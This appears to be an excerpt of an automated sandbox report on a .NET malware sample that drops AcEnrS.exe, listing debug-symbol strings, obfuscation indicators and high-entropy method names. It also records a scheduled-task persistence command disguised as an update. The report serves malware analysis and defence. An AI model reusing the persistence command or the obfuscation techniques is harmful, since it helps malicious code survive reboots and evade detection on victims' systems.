                Source: Binary string: C:\Users\user\AppData\Roaming\AcEnrS.PDB source: AcEnrS.exe, 0000000E.00000002.2400789050.0000000000797000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: System.Xml.pdb source: WER7D66.tmp.dmp.18.dr
                Source: Binary string: System.pdb source: WER7D66.tmp.dmp.18.dr
                Source: Binary string: System.Xml.ni.pdbRSDS# source: WER7D66.tmp.dmp.18.dr
                Source: Binary string: System.Core.ni.pdb source: WER7D66.tmp.dmp.18.dr
                Source: Binary string: Microsoft.VisualBasic.pdb source: WER7D66.tmp.dmp.18.dr
                Source: Binary string: ?oC:\Users\user\AppData\Roaming\UJLf.pdby source: AcEnrS.exe, 0000000E.00000002.2400789050.0000000000797000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: System.Windows.Forms.pdb source: WER7D66.tmp.dmp.18.dr
                Source: Binary string: UJLf.pdbSHA256 source: WIpGif4IRrFfamQ.exe, AcEnrS.exe.0.dr
                Source: Binary string: UJLf.pdbs\UJLf.pdbpdbJLf.pdbUJLf.pdb source: AcEnrS.exe, 0000000E.00000002.2400789050.0000000000797000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\UJLf.pdb<S%v source: AcEnrS.exe, 0000000E.00000002.2401002155.0000000000CE6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\exe\UJLf.pdbM source: AcEnrS.exe, 0000000E.00000002.2401002155.0000000000D4F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: mscorlib.pdb source: AcEnrS.exe, 0000000E.00000002.2401002155.0000000000CE6000.00000004.00000020.00020000.00000000.sdmp, WER7D66.tmp.dmp.18.dr
                Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: AcEnrS.exe, 0000000E.00000002.2401002155.0000000000CE6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Xml.pdb;( source: WER7D66.tmp.dmp.18.dr
                Source: Binary string: mscorlib.ni.pdb source: WER7D66.tmp.dmp.18.dr
                Source: Binary string: \??\C:\Windows\mscorlib.pdb source: AcEnrS.exe, 0000000E.00000002.2401002155.0000000000D4F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Core.pdb source: WER7D66.tmp.dmp.18.dr
                Source: Binary string: \??\C:\Users\user\AppData\Roaming\UJLf.pdbL source: AcEnrS.exe, 0000000E.00000002.2401002155.0000000000CE6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbl source: AcEnrS.exe, 0000000E.00000002.2401002155.0000000000CE6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\exe\UJLf.pdb= source: AcEnrS.exe, 0000000E.00000002.2401002155.0000000000D4F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER7D66.tmp.dmp.18.dr
                Source: Binary string: ysymbols\exe\UJLf.pdbow source: AcEnrS.exe, 0000000E.00000002.2400789050.0000000000797000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: System.ni.pdb source: WER7D66.tmp.dmp.18.dr
                Source: Binary string: System.Core.ni.pdbRSDS source: WER7D66.tmp.dmp.18.dr

                Data Obfuscation

                barindex
                Source: WIpGif4IRrFfamQ.exe, Form1.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                Source: AcEnrS.exe.0.dr, Form1.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                Source: 0.2.WIpGif4IRrFfamQ.exe.4af87b0.0.raw.unpack, YksRPt2hYeBck5nZ7U.cs.Net Code: HjCHRaqUBa System.Reflection.Assembly.Load(byte[])
                Source: 0.2.WIpGif4IRrFfamQ.exe.40b1ea0.5.raw.unpack, MainForm.cs.Net Code: _200E_200C_200B_202B_202E_200E_200E_202D_200B_206C_202C_202B_200B_200F_200E_206F_206C_202C_202D_200E_206E_206E_200C_206D_202C_200B_200E_202B_200B_206A_202E_206A_202E_206E_206E_206A_206C_206A_206F_202E_202E System.Reflection.Assembly.Load(byte[])
                Source: 0.2.WIpGif4IRrFfamQ.exe.4b7e7d0.2.raw.unpack, YksRPt2hYeBck5nZ7U.cs.Net Code: HjCHRaqUBa System.Reflection.Assembly.Load(byte[])
                Source: 0.2.WIpGif4IRrFfamQ.exe.4099c80.4.raw.unpack, MainForm.cs.Net Code: _200E_200C_200B_202B_202E_200E_200E_202D_200B_206C_202C_202B_200B_200F_200E_206F_206C_202C_202D_200E_206E_206E_200C_206D_202C_200B_200E_202B_200B_206A_202E_206A_202E_206E_206E_206A_206C_206A_206F_202E_202E System.Reflection.Assembly.Load(byte[])
                Source: 0.2.WIpGif4IRrFfamQ.exe.5b30000.6.raw.unpack, MainForm.cs.Net Code: _200E_200C_200B_202B_202E_200E_200E_202D_200B_206C_202C_202B_200B_200F_200E_206F_206C_202C_202D_200E_206E_206E_200C_206D_202C_200B_200E_202B_200B_206A_202E_206A_202E_206E_206E_206A_206C_206A_206F_202E_202E System.Reflection.Assembly.Load(byte[])
                Source: 0.2.WIpGif4IRrFfamQ.exe.a250000.7.raw.unpack, YksRPt2hYeBck5nZ7U.cs.Net Code: HjCHRaqUBa System.Reflection.Assembly.Load(byte[])
                Source: WIpGif4IRrFfamQ.exeStatic PE information: 0x89F24D9A [Mon May 4 13:16:10 2043 UTC]
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 0_2_0773AEF5 push FFFFFF8Bh; iretd 0_2_0773AEF7
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 9_2_013F9C30 push esp; retf 0141h9_2_013F9D55
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 9_2_06B68A45 push es; ret 9_2_06B68A50
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeCode function: 10_2_09019C3C push es; iretd 10_2_09019E02
                Source: WIpGif4IRrFfamQ.exeStatic PE information: section name: .text entropy: 7.746536493454694
                Source: AcEnrS.exe.0.drStatic PE information: section name: .text entropy: 7.746536493454694
                Source: 0.2.WIpGif4IRrFfamQ.exe.4af87b0.0.raw.unpack, knkxswQDEN8lBu51tk.csHigh entropy of concatenated method names: 'SytwbC5vQo', 'pvxwpfwaiw', 'URKw8kxNB2', 'frt8LQxXW6', 'WyX8zTFW0q', 'QLUwCJa1aY', 'odWwGlDZBS', 'w2fwSxu24Y', 'XJawn4F8Ql', 'jlxwHhZfoe'
                Source: 0.2.WIpGif4IRrFfamQ.exe.4af87b0.0.raw.unpack, m1DVkKXr4gvOPA4nK0.csHigh entropy of concatenated method names: 'jkGOmuTm1Y', 'ey3OqOmZsO', 'FQTphyNqqU', 'KXjpTTq6l0', 'Gslpc4vxJ5', 'JsGpFFViyE', 'MVFpQo3RtD', 'dCWptPPOLn', 'O9ap50kIVn', 'PxipWDopA1'
                Source: 0.2.WIpGif4IRrFfamQ.exe.4af87b0.0.raw.unpack, pQaNIlE0gJw8j7jxjk.csHigh entropy of concatenated method names: 'ToString', 'bnlye47g8q', 'TtKy9RbLfI', 'p2JyhXll6V', 'NqryTJL5w0', 'NTaycAW45m', 'w5ayFbNOnL', 'FEryQLERCW', 'aWZytYCovc', 'zvfy57un4o'
                Source: 0.2.WIpGif4IRrFfamQ.exe.4af87b0.0.raw.unpack, pGrnKxKrQR3D701DtL.csHigh entropy of concatenated method names: 'PH4BxSm9f7', 'EyOBLLHriU', 't9osC9hBvd', 'qossGnGrVa', 'zhuBet2jb4', 'WxABir45Zi', 'B9cBNOjsup', 'f3qBfOH2Ea', 'I2eBYMxPae', 'Ke9BEhIPJx'
                Source: 0.2.WIpGif4IRrFfamQ.exe.4af87b0.0.raw.unpack, oNuyuTxvZibY8ioZKb.csHigh entropy of concatenated method names: 'jrZsbNoBok', 'N20sDLrlSZ', 'QupspKSpNa', 'tpYsOy51V3', 'Lips8vsmi0', 'zTMswQ0OYK', 'fews2vrb7P', 'EMYs1kwxdx', 'aNXs3AxC6i', 'tijsIFWK88'
                Source: 0.2.WIpGif4IRrFfamQ.exe.4af87b0.0.raw.unpack, ISavHrLyvlmGYFiOsh.csHigh entropy of concatenated method names: 'xZ07GGaxqG', 'jVM7nutSnZ', 'i6U7HiZIrN', 'wh57b1s5Tt', 'AEb7DBbejK', 't5Y7Od6H4P', 'oIS78YsHqS', 'v2tsZer1v0', 'zKLsxGm1Ra', 'wVDskhEmZv'
                Source: 0.2.WIpGif4IRrFfamQ.exe.4af87b0.0.raw.unpack, XM8BCNlbKp5JEuAqSx.csHigh entropy of concatenated method names: 'wXnDfyVgrJ', 'jlxDYBSqHp', 'udSDEvhjBV', 'v4eDocYTCg', 'aqkDaxwrua', 'HnVDKXfFpS', 'XCFDZbErp3', 'qlRDxSj6PM', 'qT6DkN9sxF', 'V5VDLxlur7'
                Source: 0.2.WIpGif4IRrFfamQ.exe.4af87b0.0.raw.unpack, RpGIGn5mndsK4x9JE0.csHigh entropy of concatenated method names: 'V25wuichNE', 'kdLw0ukfuV', 'aQBwRWrrOW', 'abBwVvK9Cq', 'QSWwm5V1LJ', 'Y30wPUFSFS', 'aM1wq3SZg2', 'z6WwlCvahN', 'K08wrflwPH', 'fkZwXGpNKC'
                Source: 0.2.WIpGif4IRrFfamQ.exe.4af87b0.0.raw.unpack, Ueb4mVr79XybN88NZo.csHigh entropy of concatenated method names: 'jkCpVP3Y1N', 'cB4pPnDaZ4', 'P59pljuUyh', 'tVYprpd98O', 'l2bpAWcyoC', 'ImLpyV5jkS', 'SjgpBXqeyQ', 'TENpsfmVuV', 'H3Rp7xBe6l', 'PtwpUN4LLe'
                Source: 0.2.WIpGif4IRrFfamQ.exe.4af87b0.0.raw.unpack, KXdSrWMoC9DKnnUuBF.csHigh entropy of concatenated method names: 'zpi8gJP41l', 'EwT8DYR7L7', 'sFT8On3sxj', 'MEJ8wFy8Bs', 'Tdu82jAP4d', 'FsWOaWNK3n', 'FRvOKn8Yex', 'E53OZtLDOc', 'oQYOxMtyU0', 'SqZOkqtcsB'
                Source: 0.2.WIpGif4IRrFfamQ.exe.4af87b0.0.raw.unpack, R5of3UDxgNWEhs6P0j.csHigh entropy of concatenated method names: 'Dispose', 'riEGk2diQG', 'q2vS99Fljg', 'wHn88CM3YE', 'YANGLuyuTv', 'WibGzY8ioZ', 'ProcessDialogKey', 'VbnSCDVuZr', 'vn5SGMqCRL', 'FG9SSTSavH'
                Source: 0.2.WIpGif4IRrFfamQ.exe.4af87b0.0.raw.unpack, xD7wEtGCoU4fc01Xulr.csHigh entropy of concatenated method names: 'UqJ7uM3FSF', 'kB470P49jK', 'q5v7RJQnUJ', 'ba77VP3w7O', 'eKF7mbfYwR', 'ljE7PVSJ9p', 'L1r7qBOQFr', 'dd47lI6IfQ', 'p4m7r0pWxh', 'Of07X8h4Vn'
                Source: 0.2.WIpGif4IRrFfamQ.exe.4af87b0.0.raw.unpack, U35A56GnU8uQexd7HXb.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'DGpUf9kJvJ', 'o5HUYmwJIp', 'V5wUE34WqT', 'OVQUoBiVDe', 'WFkUaD0XDn', 'LSnUKUrqoF', 'M69UZZJ1Ax'
                Source: 0.2.WIpGif4IRrFfamQ.exe.4af87b0.0.raw.unpack, D6RRhpzZ6M1f14gDV6.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'f5s74P3QWp', 'PXh7A0VmvP', 'nDd7yuvEu8', 'oUa7B51aIn', 'rri7sJQvaT', 'DV777QI4HU', 'Xae7UWsUlq'
                Source: 0.2.WIpGif4IRrFfamQ.exe.4af87b0.0.raw.unpack, CGb0DBN599D0jgi7x9.csHigh entropy of concatenated method names: 'Nyf4lS6TU4', 'B5w4rupTQY', 'X814Mufpwu', 'deJ49BvXhR', 'NMI4TwjCBF', 'nmG4ctg7ih', 't7D4QIPSm5', 'DOL4tdtwxG', 'H3v4WaIqds', 'KSc4ePT6aB'
                Source: 0.2.WIpGif4IRrFfamQ.exe.4af87b0.0.raw.unpack, jjFS2HfKHwUO3B8t95.csHigh entropy of concatenated method names: 'XkPAW9C8MT', 'x6UAiFCf7U', 'ldkAf7LXyO', 'otHAYrO61M', 'eVqA9RSddV', 'CxsAh3C50K', 'NTDATmy602', 'NeIAc3KXd4', 'xjXAFDeCXD', 'MRcAQhN4Ye'
                Source: 0.2.WIpGif4IRrFfamQ.exe.4af87b0.0.raw.unpack, KAPMOtSlEndQ0ODUr1.csHigh entropy of concatenated method names: 'YoDRFDgQ6', 'GN3Vtgarh', 'XCFPy36xT', 'Vgnq6GsEO', 'T6CrJwcqM', 'bYNXimDWU', 'OAAWnmYILWZFNbxf5n', 'QLCVh9FamrOIOanLMg', 'qlZQEGD8qwsZhXt8ES', 'LLPsFf8ac'
                Source: 0.2.WIpGif4IRrFfamQ.exe.4af87b0.0.raw.unpack, VS1h38HfNhO9UdoG1S.csHigh entropy of concatenated method names: 'UixGwM8BCN', 'fKpG25JEuA', 'A79G3XybN8', 'iNZGIoI1DV', 'o4nGAK0QXd', 'crWGyoC9DK', 'AMSlT9BgkYOHPOKYM5', 'GRatstSZ84yLVAo1Re', 'zLDGGLxpOM', 'UsaGnNQT1r'
                Source: 0.2.WIpGif4IRrFfamQ.exe.4af87b0.0.raw.unpack, YksRPt2hYeBck5nZ7U.csHigh entropy of concatenated method names: 'uOZngLABEK', 't1lnbCAtTo', 'IlSnDqmPVE', 'IwfnpbqJEN', 'C0dnOxFaOO', 'elVn8QCFue', 'KRDnw4W18w', 'v6On2uFS9V', 'P25n1ReofT', 'aYcn3lPxKk'
                Source: 0.2.WIpGif4IRrFfamQ.exe.4b7e7d0.2.raw.unpack, knkxswQDEN8lBu51tk.csHigh entropy of concatenated method names: 'SytwbC5vQo', 'pvxwpfwaiw', 'URKw8kxNB2', 'frt8LQxXW6', 'WyX8zTFW0q', 'QLUwCJa1aY', 'odWwGlDZBS', 'w2fwSxu24Y', 'XJawn4F8Ql', 'jlxwHhZfoe'
                Source: 0.2.WIpGif4IRrFfamQ.exe.4b7e7d0.2.raw.unpack, m1DVkKXr4gvOPA4nK0.csHigh entropy of concatenated method names: 'jkGOmuTm1Y', 'ey3OqOmZsO', 'FQTphyNqqU', 'KXjpTTq6l0', 'Gslpc4vxJ5', 'JsGpFFViyE', 'MVFpQo3RtD', 'dCWptPPOLn', 'O9ap50kIVn', 'PxipWDopA1'
                Source: 0.2.WIpGif4IRrFfamQ.exe.4b7e7d0.2.raw.unpack, pQaNIlE0gJw8j7jxjk.csHigh entropy of concatenated method names: 'ToString', 'bnlye47g8q', 'TtKy9RbLfI', 'p2JyhXll6V', 'NqryTJL5w0', 'NTaycAW45m', 'w5ayFbNOnL', 'FEryQLERCW', 'aWZytYCovc', 'zvfy57un4o'
                Source: 0.2.WIpGif4IRrFfamQ.exe.4b7e7d0.2.raw.unpack, pGrnKxKrQR3D701DtL.csHigh entropy of concatenated method names: 'PH4BxSm9f7', 'EyOBLLHriU', 't9osC9hBvd', 'qossGnGrVa', 'zhuBet2jb4', 'WxABir45Zi', 'B9cBNOjsup', 'f3qBfOH2Ea', 'I2eBYMxPae', 'Ke9BEhIPJx'
                Source: 0.2.WIpGif4IRrFfamQ.exe.4b7e7d0.2.raw.unpack, oNuyuTxvZibY8ioZKb.csHigh entropy of concatenated method names: 'jrZsbNoBok', 'N20sDLrlSZ', 'QupspKSpNa', 'tpYsOy51V3', 'Lips8vsmi0', 'zTMswQ0OYK', 'fews2vrb7P', 'EMYs1kwxdx', 'aNXs3AxC6i', 'tijsIFWK88'
                Source: 0.2.WIpGif4IRrFfamQ.exe.4b7e7d0.2.raw.unpack, ISavHrLyvlmGYFiOsh.csHigh entropy of concatenated method names: 'xZ07GGaxqG', 'jVM7nutSnZ', 'i6U7HiZIrN', 'wh57b1s5Tt', 'AEb7DBbejK', 't5Y7Od6H4P', 'oIS78YsHqS', 'v2tsZer1v0', 'zKLsxGm1Ra', 'wVDskhEmZv'
                Source: 0.2.WIpGif4IRrFfamQ.exe.4b7e7d0.2.raw.unpack, XM8BCNlbKp5JEuAqSx.csHigh entropy of concatenated method names: 'wXnDfyVgrJ', 'jlxDYBSqHp', 'udSDEvhjBV', 'v4eDocYTCg', 'aqkDaxwrua', 'HnVDKXfFpS', 'XCFDZbErp3', 'qlRDxSj6PM', 'qT6DkN9sxF', 'V5VDLxlur7'
                Source: 0.2.WIpGif4IRrFfamQ.exe.4b7e7d0.2.raw.unpack, RpGIGn5mndsK4x9JE0.csHigh entropy of concatenated method names: 'V25wuichNE', 'kdLw0ukfuV', 'aQBwRWrrOW', 'abBwVvK9Cq', 'QSWwm5V1LJ', 'Y30wPUFSFS', 'aM1wq3SZg2', 'z6WwlCvahN', 'K08wrflwPH', 'fkZwXGpNKC'
                Source: 0.2.WIpGif4IRrFfamQ.exe.4b7e7d0.2.raw.unpack, Ueb4mVr79XybN88NZo.csHigh entropy of concatenated method names: 'jkCpVP3Y1N', 'cB4pPnDaZ4', 'P59pljuUyh', 'tVYprpd98O', 'l2bpAWcyoC', 'ImLpyV5jkS', 'SjgpBXqeyQ', 'TENpsfmVuV', 'H3Rp7xBe6l', 'PtwpUN4LLe'
                Source: 0.2.WIpGif4IRrFfamQ.exe.4b7e7d0.2.raw.unpack, KXdSrWMoC9DKnnUuBF.csHigh entropy of concatenated method names: 'zpi8gJP41l', 'EwT8DYR7L7', 'sFT8On3sxj', 'MEJ8wFy8Bs', 'Tdu82jAP4d', 'FsWOaWNK3n', 'FRvOKn8Yex', 'E53OZtLDOc', 'oQYOxMtyU0', 'SqZOkqtcsB'
                Source: 0.2.WIpGif4IRrFfamQ.exe.4b7e7d0.2.raw.unpack, R5of3UDxgNWEhs6P0j.csHigh entropy of concatenated method names: 'Dispose', 'riEGk2diQG', 'q2vS99Fljg', 'wHn88CM3YE', 'YANGLuyuTv', 'WibGzY8ioZ', 'ProcessDialogKey', 'VbnSCDVuZr', 'vn5SGMqCRL', 'FG9SSTSavH'
                Source: 0.2.WIpGif4IRrFfamQ.exe.4b7e7d0.2.raw.unpack, xD7wEtGCoU4fc01Xulr.csHigh entropy of concatenated method names: 'UqJ7uM3FSF', 'kB470P49jK', 'q5v7RJQnUJ', 'ba77VP3w7O', 'eKF7mbfYwR', 'ljE7PVSJ9p', 'L1r7qBOQFr', 'dd47lI6IfQ', 'p4m7r0pWxh', 'Of07X8h4Vn'
                Source: 0.2.WIpGif4IRrFfamQ.exe.4b7e7d0.2.raw.unpack, U35A56GnU8uQexd7HXb.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'DGpUf9kJvJ', 'o5HUYmwJIp', 'V5wUE34WqT', 'OVQUoBiVDe', 'WFkUaD0XDn', 'LSnUKUrqoF', 'M69UZZJ1Ax'
                Source: 0.2.WIpGif4IRrFfamQ.exe.4b7e7d0.2.raw.unpack, D6RRhpzZ6M1f14gDV6.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'f5s74P3QWp', 'PXh7A0VmvP', 'nDd7yuvEu8', 'oUa7B51aIn', 'rri7sJQvaT', 'DV777QI4HU', 'Xae7UWsUlq'
                Source: 0.2.WIpGif4IRrFfamQ.exe.4b7e7d0.2.raw.unpack, CGb0DBN599D0jgi7x9.csHigh entropy of concatenated method names: 'Nyf4lS6TU4', 'B5w4rupTQY', 'X814Mufpwu', 'deJ49BvXhR', 'NMI4TwjCBF', 'nmG4ctg7ih', 't7D4QIPSm5', 'DOL4tdtwxG', 'H3v4WaIqds', 'KSc4ePT6aB'
                Source: 0.2.WIpGif4IRrFfamQ.exe.4b7e7d0.2.raw.unpack, jjFS2HfKHwUO3B8t95.csHigh entropy of concatenated method names: 'XkPAW9C8MT', 'x6UAiFCf7U', 'ldkAf7LXyO', 'otHAYrO61M', 'eVqA9RSddV', 'CxsAh3C50K', 'NTDATmy602', 'NeIAc3KXd4', 'xjXAFDeCXD', 'MRcAQhN4Ye'
                Source: 0.2.WIpGif4IRrFfamQ.exe.4b7e7d0.2.raw.unpack, KAPMOtSlEndQ0ODUr1.csHigh entropy of concatenated method names: 'YoDRFDgQ6', 'GN3Vtgarh', 'XCFPy36xT', 'Vgnq6GsEO', 'T6CrJwcqM', 'bYNXimDWU', 'OAAWnmYILWZFNbxf5n', 'QLCVh9FamrOIOanLMg', 'qlZQEGD8qwsZhXt8ES', 'LLPsFf8ac'
                Source: 0.2.WIpGif4IRrFfamQ.exe.4b7e7d0.2.raw.unpack, VS1h38HfNhO9UdoG1S.csHigh entropy of concatenated method names: 'UixGwM8BCN', 'fKpG25JEuA', 'A79G3XybN8', 'iNZGIoI1DV', 'o4nGAK0QXd', 'crWGyoC9DK', 'AMSlT9BgkYOHPOKYM5', 'GRatstSZ84yLVAo1Re', 'zLDGGLxpOM', 'UsaGnNQT1r'
                Source: 0.2.WIpGif4IRrFfamQ.exe.4b7e7d0.2.raw.unpack, YksRPt2hYeBck5nZ7U.csHigh entropy of concatenated method names: 'uOZngLABEK', 't1lnbCAtTo', 'IlSnDqmPVE', 'IwfnpbqJEN', 'C0dnOxFaOO', 'elVn8QCFue', 'KRDnw4W18w', 'v6On2uFS9V', 'P25n1ReofT', 'aYcn3lPxKk'
                Source: 0.2.WIpGif4IRrFfamQ.exe.a250000.7.raw.unpack, knkxswQDEN8lBu51tk.csHigh entropy of concatenated method names: 'SytwbC5vQo', 'pvxwpfwaiw', 'URKw8kxNB2', 'frt8LQxXW6', 'WyX8zTFW0q', 'QLUwCJa1aY', 'odWwGlDZBS', 'w2fwSxu24Y', 'XJawn4F8Ql', 'jlxwHhZfoe'
                Source: 0.2.WIpGif4IRrFfamQ.exe.a250000.7.raw.unpack, m1DVkKXr4gvOPA4nK0.csHigh entropy of concatenated method names: 'jkGOmuTm1Y', 'ey3OqOmZsO', 'FQTphyNqqU', 'KXjpTTq6l0', 'Gslpc4vxJ5', 'JsGpFFViyE', 'MVFpQo3RtD', 'dCWptPPOLn', 'O9ap50kIVn', 'PxipWDopA1'
                Source: 0.2.WIpGif4IRrFfamQ.exe.a250000.7.raw.unpack, pQaNIlE0gJw8j7jxjk.csHigh entropy of concatenated method names: 'ToString', 'bnlye47g8q', 'TtKy9RbLfI', 'p2JyhXll6V', 'NqryTJL5w0', 'NTaycAW45m', 'w5ayFbNOnL', 'FEryQLERCW', 'aWZytYCovc', 'zvfy57un4o'
                Source: 0.2.WIpGif4IRrFfamQ.exe.a250000.7.raw.unpack, pGrnKxKrQR3D701DtL.csHigh entropy of concatenated method names: 'PH4BxSm9f7', 'EyOBLLHriU', 't9osC9hBvd', 'qossGnGrVa', 'zhuBet2jb4', 'WxABir45Zi', 'B9cBNOjsup', 'f3qBfOH2Ea', 'I2eBYMxPae', 'Ke9BEhIPJx'
                Source: 0.2.WIpGif4IRrFfamQ.exe.a250000.7.raw.unpack, oNuyuTxvZibY8ioZKb.csHigh entropy of concatenated method names: 'jrZsbNoBok', 'N20sDLrlSZ', 'QupspKSpNa', 'tpYsOy51V3', 'Lips8vsmi0', 'zTMswQ0OYK', 'fews2vrb7P', 'EMYs1kwxdx', 'aNXs3AxC6i', 'tijsIFWK88'
                Source: 0.2.WIpGif4IRrFfamQ.exe.a250000.7.raw.unpack, ISavHrLyvlmGYFiOsh.csHigh entropy of concatenated method names: 'xZ07GGaxqG', 'jVM7nutSnZ', 'i6U7HiZIrN', 'wh57b1s5Tt', 'AEb7DBbejK', 't5Y7Od6H4P', 'oIS78YsHqS', 'v2tsZer1v0', 'zKLsxGm1Ra', 'wVDskhEmZv'
                Source: 0.2.WIpGif4IRrFfamQ.exe.a250000.7.raw.unpack, XM8BCNlbKp5JEuAqSx.csHigh entropy of concatenated method names: 'wXnDfyVgrJ', 'jlxDYBSqHp', 'udSDEvhjBV', 'v4eDocYTCg', 'aqkDaxwrua', 'HnVDKXfFpS', 'XCFDZbErp3', 'qlRDxSj6PM', 'qT6DkN9sxF', 'V5VDLxlur7'
                Source: 0.2.WIpGif4IRrFfamQ.exe.a250000.7.raw.unpack, RpGIGn5mndsK4x9JE0.csHigh entropy of concatenated method names: 'V25wuichNE', 'kdLw0ukfuV', 'aQBwRWrrOW', 'abBwVvK9Cq', 'QSWwm5V1LJ', 'Y30wPUFSFS', 'aM1wq3SZg2', 'z6WwlCvahN', 'K08wrflwPH', 'fkZwXGpNKC'
                Source: 0.2.WIpGif4IRrFfamQ.exe.a250000.7.raw.unpack, Ueb4mVr79XybN88NZo.csHigh entropy of concatenated method names: 'jkCpVP3Y1N', 'cB4pPnDaZ4', 'P59pljuUyh', 'tVYprpd98O', 'l2bpAWcyoC', 'ImLpyV5jkS', 'SjgpBXqeyQ', 'TENpsfmVuV', 'H3Rp7xBe6l', 'PtwpUN4LLe'
                Source: 0.2.WIpGif4IRrFfamQ.exe.a250000.7.raw.unpack, KXdSrWMoC9DKnnUuBF.csHigh entropy of concatenated method names: 'zpi8gJP41l', 'EwT8DYR7L7', 'sFT8On3sxj', 'MEJ8wFy8Bs', 'Tdu82jAP4d', 'FsWOaWNK3n', 'FRvOKn8Yex', 'E53OZtLDOc', 'oQYOxMtyU0', 'SqZOkqtcsB'
                Source: 0.2.WIpGif4IRrFfamQ.exe.a250000.7.raw.unpack, R5of3UDxgNWEhs6P0j.csHigh entropy of concatenated method names: 'Dispose', 'riEGk2diQG', 'q2vS99Fljg', 'wHn88CM3YE', 'YANGLuyuTv', 'WibGzY8ioZ', 'ProcessDialogKey', 'VbnSCDVuZr', 'vn5SGMqCRL', 'FG9SSTSavH'
                Source: 0.2.WIpGif4IRrFfamQ.exe.a250000.7.raw.unpack, xD7wEtGCoU4fc01Xulr.csHigh entropy of concatenated method names: 'UqJ7uM3FSF', 'kB470P49jK', 'q5v7RJQnUJ', 'ba77VP3w7O', 'eKF7mbfYwR', 'ljE7PVSJ9p', 'L1r7qBOQFr', 'dd47lI6IfQ', 'p4m7r0pWxh', 'Of07X8h4Vn'
                Source: 0.2.WIpGif4IRrFfamQ.exe.a250000.7.raw.unpack, U35A56GnU8uQexd7HXb.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'DGpUf9kJvJ', 'o5HUYmwJIp', 'V5wUE34WqT', 'OVQUoBiVDe', 'WFkUaD0XDn', 'LSnUKUrqoF', 'M69UZZJ1Ax'
                Source: 0.2.WIpGif4IRrFfamQ.exe.a250000.7.raw.unpack, D6RRhpzZ6M1f14gDV6.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'f5s74P3QWp', 'PXh7A0VmvP', 'nDd7yuvEu8', 'oUa7B51aIn', 'rri7sJQvaT', 'DV777QI4HU', 'Xae7UWsUlq'
                Source: 0.2.WIpGif4IRrFfamQ.exe.a250000.7.raw.unpack, CGb0DBN599D0jgi7x9.csHigh entropy of concatenated method names: 'Nyf4lS6TU4', 'B5w4rupTQY', 'X814Mufpwu', 'deJ49BvXhR', 'NMI4TwjCBF', 'nmG4ctg7ih', 't7D4QIPSm5', 'DOL4tdtwxG', 'H3v4WaIqds', 'KSc4ePT6aB'
                Source: 0.2.WIpGif4IRrFfamQ.exe.a250000.7.raw.unpack, jjFS2HfKHwUO3B8t95.csHigh entropy of concatenated method names: 'XkPAW9C8MT', 'x6UAiFCf7U', 'ldkAf7LXyO', 'otHAYrO61M', 'eVqA9RSddV', 'CxsAh3C50K', 'NTDATmy602', 'NeIAc3KXd4', 'xjXAFDeCXD', 'MRcAQhN4Ye'
                Source: 0.2.WIpGif4IRrFfamQ.exe.a250000.7.raw.unpack, KAPMOtSlEndQ0ODUr1.csHigh entropy of concatenated method names: 'YoDRFDgQ6', 'GN3Vtgarh', 'XCFPy36xT', 'Vgnq6GsEO', 'T6CrJwcqM', 'bYNXimDWU', 'OAAWnmYILWZFNbxf5n', 'QLCVh9FamrOIOanLMg', 'qlZQEGD8qwsZhXt8ES', 'LLPsFf8ac'
                Source: 0.2.WIpGif4IRrFfamQ.exe.a250000.7.raw.unpack, VS1h38HfNhO9UdoG1S.csHigh entropy of concatenated method names: 'UixGwM8BCN', 'fKpG25JEuA', 'A79G3XybN8', 'iNZGIoI1DV', 'o4nGAK0QXd', 'crWGyoC9DK', 'AMSlT9BgkYOHPOKYM5', 'GRatstSZ84yLVAo1Re', 'zLDGGLxpOM', 'UsaGnNQT1r'
                Source: 0.2.WIpGif4IRrFfamQ.exe.a250000.7.raw.unpack, YksRPt2hYeBck5nZ7U.csHigh entropy of concatenated method names: 'uOZngLABEK', 't1lnbCAtTo', 'IlSnDqmPVE', 'IwfnpbqJEN', 'C0dnOxFaOO', 'elVn8QCFue', 'KRDnw4W18w', 'v6On2uFS9V', 'P25n1ReofT', 'aYcn3lPxKk'
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeFile created: C:\Users\user\AppData\Roaming\AcEnrS.exeJump to dropped file

                Boot Survival

                barindex
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AcEnrS" /XML "C:\Users\user\AppData\Local\Temp\tmp5423.tmp"

                Hooking and other Techniques for Hiding and Protection

                barindex
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
